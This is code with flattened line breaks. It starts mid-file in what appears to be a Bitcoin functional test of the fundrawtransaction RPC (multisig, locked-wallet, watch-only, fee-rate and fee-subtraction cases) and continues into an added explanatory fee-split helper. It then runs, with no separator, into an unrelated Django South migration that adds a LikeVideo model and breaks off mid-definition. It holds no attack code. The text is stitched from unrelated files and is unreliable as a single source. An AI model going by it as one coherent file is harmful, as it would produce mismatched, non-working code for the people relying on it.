out['scriptPubKey']['addresses'][0] in outputs: matchingOuts+=1 else: assert_equal(i, rawtxfund['changepos']) assert_equal(utx['txid'], dec_tx['vin'][0]['txid']) assert_equal("00", dec_tx['vin'][0]['scriptSig']['hex']) assert_equal(matchingOuts, 1) assert_equal(len(dec_tx['vout']), 2) ########################################### # test a fundrawtransaction with two VINs # ########################################### utx = get_unspent(self.nodes[2].listunspent(), 1) utx2 = get_unspent(self.nodes[2].listunspent(), 5) inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']},{'txid' : utx2['txid'], 'vout' : utx2['vout']} ] outputs = { self.nodes[0].getnewaddress() : 6.0 } rawtx = self.nodes[2].createrawtransaction(inputs, outputs) dec_tx = self.nodes[2].decoderawtransaction(rawtx) assert_equal(utx['txid'], dec_tx['vin'][0]['txid']) rawtxfund = self.nodes[2].fundrawtransaction(rawtx) fee = rawtxfund['fee'] dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex']) totalOut = 0 matchingOuts = 0 for out in dec_tx['vout']: totalOut += out['value'] if out['scriptPubKey']['addresses'][0] in outputs: matchingOuts+=1 assert_equal(matchingOuts, 1) assert_equal(len(dec_tx['vout']), 2) matchingIns = 0 for vinOut in dec_tx['vin']: for vinIn in inputs: if vinIn['txid'] == vinOut['txid']: matchingIns+=1 
assert_equal(matchingIns, 2) #we now must see two vins identical to vins given as params ######################################################### # test a fundrawtransaction with two VINs and two vOUTs # ######################################################### utx = get_unspent(self.nodes[2].listunspent(), 1) utx2 = get_unspent(self.nodes[2].listunspent(), 5) inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']},{'txid' : utx2['txid'], 'vout' : utx2['vout']} ] outputs = { self.nodes[0].getnewaddress() : 6.0, self.nodes[0].getnewaddress() : 1.0 } rawtx = self.nodes[2].createrawtransaction(inputs, outputs) dec_tx = self.nodes[2].decoderawtransaction(rawtx) assert_equal(utx['txid'], dec_tx['vin'][0]['txid']) rawtxfund = self.nodes[2].fundrawtransaction(rawtx) fee = rawtxfund['fee'] dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex']) totalOut = 0 matchingOuts = 0 for out in dec_tx['vout']: totalOut += out['value'] if out['scriptPubKey']['addresses'][0] in outputs: matchingOuts+=1 assert_equal(matchingOuts, 2) assert_equal(len(dec_tx['vout']), 3) ############################################## # test a fundrawtransaction with invalid vin # ############################################## listunspent = self.nodes[2].listunspent() inputs = [ {'txid' : "1c7f966dab21119bac53213a2bc7532bff1fa844c124fd750a7d0b1332440bd1", 'vout' : 0} ] #invalid vin! outputs = { self.nodes[0].getnewaddress() : 1.0} rawtx = self.nodes[2].createrawtransaction(inputs, outputs) dec_tx = self.nodes[2].decoderawtransaction(rawtx) assert_raises_jsonrpc(-4, "Insufficient funds", self.nodes[2].fundrawtransaction, rawtx) ############################################################ #compare fee of a standard pubkeyhash transaction inputs = [] outputs = {self.nodes[1].getnewaddress():1.1} rawtx = self.nodes[0].createrawtransaction(inputs, outputs) fundedTx = self.nodes[0].fundrawtransaction(rawtx) #create same transaction over sendtoaddress txId = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 1.1) signedFee = self.nodes[0].getrawmempool(True)[txId]['fee'] #compare fee feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee) assert(feeDelta >= 0 and feeDelta <= feeTolerance) ############################################################ ############################################################ #compare fee of a standard pubkeyhash transaction with multiple outputs inputs = [] outputs = {self.nodes[1].getnewaddress():1.1,self.nodes[1].getnewaddress():1.2,self.nodes[1].getnewaddress():0.1,self.nodes[1].getnewaddress():1.3,self.nodes[1].getnewaddress():0.2,self.nodes[1].getnewaddress():0.3} rawtx = self.nodes[0].createrawtransaction(inputs, outputs) fundedTx = self.nodes[0].fundrawtransaction(rawtx) #create same transaction over sendtoaddress txId = self.nodes[0].sendmany("", outputs) signedFee = self.nodes[0].getrawmempool(True)[txId]['fee'] #compare fee feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee) assert(feeDelta >= 0 and feeDelta <= feeTolerance) ############################################################ ############################################################ #compare fee of a 2of2 multisig p2sh transaction # create 2of2 addr addr1 = self.nodes[1].getnewaddress() addr2 = self.nodes[1].getnewaddress() addr1Obj = self.nodes[1].validateaddress(addr1) addr2Obj = self.nodes[1].validateaddress(addr2) mSigObj = self.nodes[1].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']]) inputs = [] outputs = {mSigObj:1.1} rawtx = self.nodes[0].createrawtransaction(inputs, outputs) fundedTx = 
self.nodes[0].fundrawtransaction(rawtx) #create same transaction over sendtoaddress txId = self.nodes[0].sendtoaddress(mSigObj, 1.1) signedFee = self.nodes[0].getrawmempool(True)[txId]['fee'] #compare fee feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee) assert(feeDelta >= 0 and feeDelta <= feeTolerance) ############################################################ ############################################################ #compare fee of a standard pubkeyhash transaction # create 4of5 addr addr1 = self.nodes[1].getnewaddress() addr2 = self.nodes[1].getnewaddress() addr3 = self.nodes[1].getnewaddress() addr4 = self.nodes[1].getnewaddress() addr5 = self.nodes[1].getnewaddress() addr1Obj = self.nodes[1].validateaddress(addr1) addr2Obj = self.nodes[1].validateaddress(addr2) addr3Obj = self.nodes[1].validateaddress(addr3) addr4Obj = self.nodes[1].validateaddress(addr4) addr5Obj = self.nodes[1].validateaddress(addr5) mSigObj = self.nodes[1].addmultisigaddress(4, [addr1Obj['pubkey'], addr2Obj['pubkey'], addr3Obj['pubkey'], addr4Obj['pubkey'], addr5Obj['pubkey']]) inputs = [] outputs = {mSigObj:1.1} rawtx = self.nodes[0].createrawtransaction(inputs, outputs) fundedTx = self.nodes[0].fundrawtransaction(rawtx) #create same transaction over sendtoaddress txId = self.nodes[0].sendtoaddress(mSigObj, 1.1) signedFee = self.nodes[0].getrawmempool(True)[txId]['fee'] #compare fee feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee) assert(feeDelta >= 0 and feeDelta <= feeTolerance) ############################################################ ############################################################ # spend a 2of2 multisig transaction over fundraw # create 2of2 addr addr1 = self.nodes[2].getnewaddress() addr2 = self.nodes[2].getnewaddress() addr1Obj = self.nodes[2].validateaddress(addr1) addr2Obj = self.nodes[2].validateaddress(addr2) mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']]) # send 1.2 BTC to msig addr txId = self.nodes[0].sendtoaddress(mSigObj, 1.2) self.sync_all() self.nodes[1].generate(1) self.sync_all() oldBalance = self.nodes[1].getbalance() inputs = [] outputs = {self.nodes[1].getnewaddress():1.1} rawtx = self.nodes[2].createrawtransaction(inputs, outputs) fundedTx = self.nodes[2].fundrawtransaction(rawtx) signedTx = self.nodes[2].signrawtransaction(fundedTx['hex']) txId = self.nodes[2].sendrawtransaction(signedTx['hex']) self.sync_all() self.nodes[1].generate(1) self.sync_all() # make sure funds are received at node1 assert_equal(oldBalance+Decimal('1.10000000'), self.nodes[1].getbalance()) ############################################################ # locked wallet test self.stop_node(0) self.stop_node(2) self.stop_node(3) self.nodes[1].encryptwallet("test") self.bitcoind_processes[1].wait(timeout=BITCOIND_PROC_WAIT_TIMEOUT) self.nodes = self.start_nodes(self.num_nodes, self.options.tmpdir) # This test is not meant to test fee estimation and we'd like # to be sure all txs are sent at a consistent desired feerate for node in self.nodes: node.settxfee(min_relay_tx_fee) connect_nodes_bi(self.nodes,0,1) connect_nodes_bi(self.nodes,1,2) connect_nodes_bi(self.nodes,0,2) connect_nodes_bi(self.nodes,0,3) self.sync_all() # drain the keypool self.nodes[1].getnewaddress() self.nodes[1].getrawchangeaddress() inputs = [] outputs = {self.nodes[0].getnewaddress():1.1} rawtx = self.nodes[1].createrawtransaction(inputs, outputs) # fund a transaction that requires a new key for the change output # creating the key must be impossible because the wallet is 
locked assert_raises_jsonrpc(-4, "Keypool ran out, please call keypoolrefill first", self.nodes[1].fundrawtransaction, rawtx) #refill the keypool self.nodes[1].walletpassphrase("test", 100) self.nodes[1].keypoolrefill(8) #need to refill the keypool to get an internal change address self.nodes[1].walletlock() assert_raises_jsonrpc(-13, "walletpassphrase", self.nodes[1].sendtoaddress, self.nodes[0].getnewaddress(), 1.2) oldBalance = self.nodes[0].getbalance() inputs = [] outputs = {self.nodes[0].getnewaddress():1.1} rawtx = self.nodes[1].createrawtransaction(inputs, outputs) fundedTx = self.nodes[1].fundrawtransaction(rawtx) #now we need to unlock self.nodes[1].walletpassphrase("test", 600) signedTx = self.nodes[1].signrawtransaction(fundedTx['hex']) txId = self.nodes[1].sendrawtransaction(signedTx['hex']) self.nodes[1].generate(1) self.sync_all() # make sure funds are received at node1 assert_equal(oldBalance+Decimal('51.10000000'), self.nodes[0].getbalance()) ############################################### # multiple (~19) inputs tx test | Compare fee # ############################################### #empty node1, send some small coins from node0 to node1 self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), self.nodes[1].getbalance(), "", "", True) self.sync_all() self.nodes[0].generate(1) self.sync_all() for i in range(0,20): self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 0.01) self.nodes[0].generate(1) self.sync_all() #fund a tx with ~20 small inputs inputs = [] outputs = {self.nodes[0].getnewaddress():0.15,self.nodes[0].getnewaddress():0.04} rawtx = self.nodes[1].createrawtransaction(inputs, outputs) fundedTx = self.nodes[1].fundrawtransaction(rawtx) #create same transaction over sendtoaddress txId = self.nodes[1].sendmany("", outputs) signedFee = self.nodes[1].getrawmempool(True)[txId]['fee'] #compare fee feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee) assert(feeDelta >= 0 and feeDelta <= feeTolerance*19) #~19 inputs ############################################# # multiple (~19) inputs tx test | sign/send # ############################################# #again, empty node1, send some small coins from node0 to node1 self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), self.nodes[1].getbalance(), "", "", True) self.sync_all() self.nodes[0].generate(1) self.sync_all() for i in range(0,20): self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 0.01) self.nodes[0].generate(1) self.sync_all() #fund a tx with ~20 small inputs oldBalance = self.nodes[0].getbalance() inputs = [] outputs = {self.nodes[0].getnewaddress():0.15,self.nodes[0].getnewaddress():0.04} rawtx = self.nodes[1].createrawtransaction(inputs, outputs) fundedTx = self.nodes[1].fundrawtransaction(rawtx) fundedAndSignedTx = self.nodes[1].signrawtransaction(fundedTx['hex']) txId = self.nodes[1].sendrawtransaction(fundedAndSignedTx['hex']) self.sync_all() self.nodes[0].generate(1) self.sync_all() assert_equal(oldBalance+Decimal('50.19000000'), self.nodes[0].getbalance()) #0.19+block reward ##################################################### # test fundrawtransaction with OP_RETURN and no vin # ##################################################### rawtx = "0100000000010000000000000000066a047465737400000000" dec_tx = self.nodes[2].decoderawtransaction(rawtx) assert_equal(len(dec_tx['vin']), 0) assert_equal(len(dec_tx['vout']), 1) rawtxfund = self.nodes[2].fundrawtransaction(rawtx) dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex']) assert_greater_than(len(dec_tx['vin']), 0) # at least 
one vin assert_equal(len(dec_tx['vout']), 2) # one change output added ################################################## # test a fundrawtransaction using only watchonly # ################################################## inputs = [] outputs = {self.nodes[2].getnewaddress() : watchonly_amount / 2} rawtx = self.nodes[3].createrawtransaction(inputs, outputs) result = self.nodes[3].fundrawtransaction(rawtx, {'includeWatching': True }) res_dec = self.nodes[0].decoderawtransaction(result["hex"]) assert_equal(len(res_dec["vin"]), 1) assert_equal(res_dec["vin"][0]["txid"], watchonly_txid) assert("fee" in result.keys()) assert_greater_than(result["changepos"], -1) ############################################################### # test fundrawtransaction using the entirety of watched funds # ############################################################### inputs = [] outputs = {self.nodes[2].getnewaddress() : watchonly_amount} rawtx = self.nodes[3].createrawtransaction(inputs, outputs) # Backward compatibility test (2nd param is includeWatching) result = self.nodes[3].fundrawtransaction(rawtx, True) res_dec = self.nodes[0].decoderawtransaction(result["hex"]) assert_equal(len(res_dec["vin"]), 2) assert(res_dec["vin"][0]["txid"] == watchonly_txid or res_dec["vin"][1]["txid"] == watchonly_txid) assert_greater_than(result["fee"], 0) assert_greater_than(result["changepos"], -1) assert_equal(result["fee"] + res_dec["vout"][result["changepos"]]["value"], watchonly_amount / 10) signedtx = self.nodes[3].signrawtransaction(result["hex"]) assert(not signedtx["complete"]) signedtx = self.nodes[0].signrawtransaction(signedtx["hex"]) assert(signedtx["complete"]) self.nodes[0].sendrawtransaction(signedtx["hex"]) self.nodes[0].generate(1) self.sync_all() ####################### # Test feeRate option # ####################### # Make sure there is exactly one input so coin selection can't skew the result assert_equal(len(self.nodes[3].listunspent(1)), 1) inputs = [] outputs = {self.nodes[3].getnewaddress() : 1} rawtx = self.nodes[3].createrawtransaction(inputs, outputs) result = self.nodes[3].fundrawtransaction(rawtx) # uses min_relay_tx_fee (set by settxfee) result2 = self.nodes[3].fundrawtransaction(rawtx, {"feeRate": 2*min_relay_tx_fee}) result3 = self.nodes[3].fundrawtransaction(rawtx, {"feeRate": 10*min_relay_tx_fee}) result_fee_rate = result['fee'] * 1000 / count_bytes(result['hex']) assert_fee_amount(result2['fee'], count_bytes(result2['hex']), 2 * result_fee_rate) assert_fee_amount(result3['fee'], count_bytes(result3['hex']), 10 * result_fee_rate) ################################ # Test no address reuse occurs # ################################ result3 = self.nodes[3].fundrawtransaction(rawtx) res_dec = self.nodes[0].decoderawtransaction(result3["hex"]) changeaddress = "" for out in res_dec['vout']: if out['value'] > 1.0: changeaddress += out['scriptPubKey']['addresses'][0] assert(changeaddress != "") nextaddr = self.nodes[3].getnewaddress() # Now the change address key should be removed from the keypool assert(changeaddress != nextaddr) ###################################### # Test subtractFeeFromOutputs option # ###################################### # Make sure there is exactly one input so coin selection can't skew the result assert_equal(len(self.nodes[3].listunspent(1)), 1) inputs = [] outputs = {self.nodes[2].getnewaddress(): 1} rawtx = self.nodes[3].createrawtransaction(inputs, outputs) result = [self.nodes[3].fundrawtransaction(rawtx), # uses min_relay_tx_fee (set by settxfee) 
self.nodes[3].fundrawtransaction(rawtx, {"subtractFeeFromOutputs": []}), # empty subtraction list self.nodes[3].fundrawtransaction(rawtx, {"subtractFeeFromOutputs": [0]}), # uses min_relay_tx_fee (set by settxfee) self.nodes[3].fundrawtransaction(rawtx, {"feeRate": 2*min_relay_tx_fee}), self.nodes[3].fundrawtransaction(rawtx, {"feeRate": 2*min_relay_tx_fee, "subtractFeeFromOutputs": [0]})] dec_tx = [self.nodes[3].decoderawtransaction(tx['hex']) for tx in result] output = [d['vout'][1 - r['changepos']]['value'] for d, r in zip(dec_tx, result)] change = [d['vout'][r['changepos']]['value'] for d, r in zip(dec_tx, result)] assert_equal(result[0]['fee'], result[1]['fee'], result[2]['fee']) assert_equal(result[3]['fee'], result[4]['fee']) assert_equal(change[0], change[1]) assert_equal(output[0], output[1]) assert_equal(output[0], output[2] + result[2]['fee']) assert_equal(change[0] + result[0]['fee'], change[2]) assert_equal(output[3], output[4] + result[4]['fee']) assert_equal(change[3] + result[3]['fee'], change[4]) inputs = [] outputs = {self.nodes[2].getnewaddress(): value for value in (1.0, 1.1, 1.2, 1.3)} rawtx = self.nodes[3].createrawtransaction(inputs, outputs) result = [self.nodes[3].fundrawtransaction(rawtx), # split the fee between outputs 0, 2, and 3, but not output 1 self.nodes[3].fundrawtransaction(rawtx, {"subtractFeeFromOutputs": [0, 2, 3]})] dec_tx = [self.nodes[3].decoderawtransaction(result[0]['hex']), self.nodes[3].decoderawtransaction(result[1]['hex'])] # Nested list of non-change output amounts for each transaction output = [[out['value'] for i, out in enumerate(d['vout']) if i != r['changepos']] for d, r in zip(dec_tx, result)] # List of differences in output amounts between normal and subtractFee transactions share = [o0 - o1 for o0, o1 in zip(output[0], output[1])] # output 1 is the same in both transactions assert_equal(share[1], 0) # the other 3 outputs are smaller as a result of subtractFeeFromOutputs assert_greater_than(share[0], 0) assert_greater_than(share[2], 0) assert_greater_than(share[3], 0) # outputs 2 and 3 take the same share of the fee assert_equal(share[2], share[3]) # output 0 takes at least as much share of the fee, and no more than 2 satoshis more, than outputs 2 and 3 assert_greater_than_or_equal(share[0], share[2]) assert_greater_than_or_equal(share[2] + Decimal(2e-8), share[0]) # the fee is the same in both transactions assert_equal(result[0]['fee'], result[1]['fee']) # the total subtracted from the outputs is equal to the fee assert_equal(share[0] + share[2] + share[3], result[0]['fee']) if __name__ == '__main__': RawTransactionsTest().main()
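#####################################################################
# Illustrative sketch: fee split implied by subtractFeeFromOutputs  #
#####################################################################
# Not part of the test above; the helper name and logic are hypothetical.
# The assertions above are consistent with the fee being divided evenly, in
# satoshis, across the selected outputs, with any remainder (at most a couple
# of satoshis) charged to the first selected output -- hence the 2e-8
# tolerance allowed between share[0] and share[2]/share[3].
from decimal import Decimal

def expected_fee_shares(fee_btc, num_selected):
    """Split fee_btc (a Decimal in BTC) across num_selected outputs, satoshi-exact."""
    fee_sat = int(fee_btc * Decimal('1e8'))
    base, remainder = divmod(fee_sat, num_selected)
    shares_sat = [base + remainder] + [base] * (num_selected - 1)
    return [Decimal(s) / Decimal('1e8') for s in shares_sat]

# Example: a 4509-satoshi fee over three outputs splits as 1503/1503/1503,
# while 4510 satoshis would split as 1504/1503/1503; either way the shares
# sum back to the fee, matching the final assert_equal above.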
# -*- coding: utf-8 -*- from south.utils import datetime_utils as datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding model 'LikeVideo' db.create_table(u'catalog_likevideo', ( (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('added_time', self.gf('django.db.models.fields.DateTimeField')()), ('is_enabled', self.gf('django.db.models.fields.BooleanField')(default=True)), ('score', self.gf('django.db.models.fields.IntegerField')(default=0)), ('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])), ('video', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['catalog.Video'])), )) db.send_create_signal('catalog', ['LikeVideo']) # Adding unique constraint on 'LikeVideo', fields ['user', 'video'] db.create_unique(u'catalog_likevideo', ['user_id', 'video_id']) # Adding field 'Video.likes_count' db.add_column(u'catalog_video', 'likes_count', self.gf('django.db.models.fields.IntegerField')(default=0), keep_default=False) def backwards(self, orm): # Removing unique constraint on 'LikeVideo', fields ['user', 'video'] db.delete_unique(u'catalog_likevideo', ['user_id', 'video_id']) # Deleting model 'LikeVideo' db.delete_table(u'catalog_likevideo') # Deleting field 'Video.likes_count' db.delete_column(u'catalog_video', 'likes_count') models = { u'auth.group': { 'Meta': {'object_name': 'Group'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, u'auth.permission': { 'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, u'auth.user': { 'Meta': {'object_name': 'User'}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': 
"u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}), 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) }, 'catalog.cfistoreitem': { 'Meta': {'object_name': 'CfiStoreItem'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'item': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['catalog.Product']", 'unique': 'True'}), 'likers': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'cfi_store_item_likes'", 'symmetrical': 'False', 'through': "orm['catalog.LikeCfiStoreItem']", 'to': u"orm['auth.User']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'catalog.comment': { 'Meta': {'object_name': 'Comment'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), 'body': ('django.db.models.fields.CharField', [], {'max_length': '1000'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.documentation': { 'Meta': {'object_name': 'Documentation'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}), 'url': ('django.db.models.fields.URLField', [], {'max_length': '1000'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}) }, 'catalog.emailcollect': { 'Meta': {'object_name': 'EmailCollect'}, 'email': ('django.db.models.fields.EmailField', [], {'max_length': '30'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}) }, 'catalog.image': { 'Meta': {'object_name': 'Image'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), 'comments': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['catalog.Comment']", 'null': 'True', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'large_url': ('django.db.models.fields.URLField', [], {'max_length': '1000'}), 'likes_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'small_url': ('django.db.models.fields.URLField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'images'", 'null': 'True', 'to': u"orm['auth.User']"}) }, 'catalog.like': { 'Meta': {'object_name': 'Like'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': 
('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.likecfistoreitem': { 'Meta': {'unique_together': "(('user', 'cfi_store_item'),)", 'object_name': 'LikeCfiStoreItem'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), 'cfi_store_item': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.CfiStoreItem']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.likeimage': { 'Meta': {'unique_together': "(('user', 'image'),)", 'object_name': 'LikeImage'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Image']"}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.likemakey': { 'Meta': {'unique_together': "(('user', 'makey'),)", 'object_name': 'LikeMakey'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'makey': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Makey']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.likenote': { 'Meta': {'unique_together': "(('user', 'note'),)", 'object_name': 'LikeNote'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'note': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Note']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.likeproduct': { 'Meta': {'unique_together': "(('user', 'product'),)", 'object_name': 'LikeProduct'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.likeproductdescription': { 'Meta': {'unique_together': "(('user', 'product_description'),)", 'object_name': 'LikeProductDescription'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'product_description': ('django.db.models.fields.related.ForeignKey', [], {'to': 
"orm['catalog.ProductDescription']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.likeproductimage': { 'Meta': {'unique_together': "(('user', 'image'),)", 'object_name': 'LikeProductImage'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.ProductImage']"}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.likeproducttutorial': { 'Meta': {'unique_together': "(('user', 'tutorial', 'product'),)", 'object_name': 'LikeProductTutorial'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'tutorial': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Tutorial']"}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.likeshop': { 'Meta': {'unique_together': "(('user', 'shop'),)", 'object_name': 'LikeShop'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Shop']"}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.likevideo': { 'Meta': {'unique_together': "(('user', 'video'),)", 'object_name': 'LikeVideo'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}), 'video': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Video']"}) }, 'catalog.list': { 'Meta': {'object_name': 'List'}, 'access': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'access'", 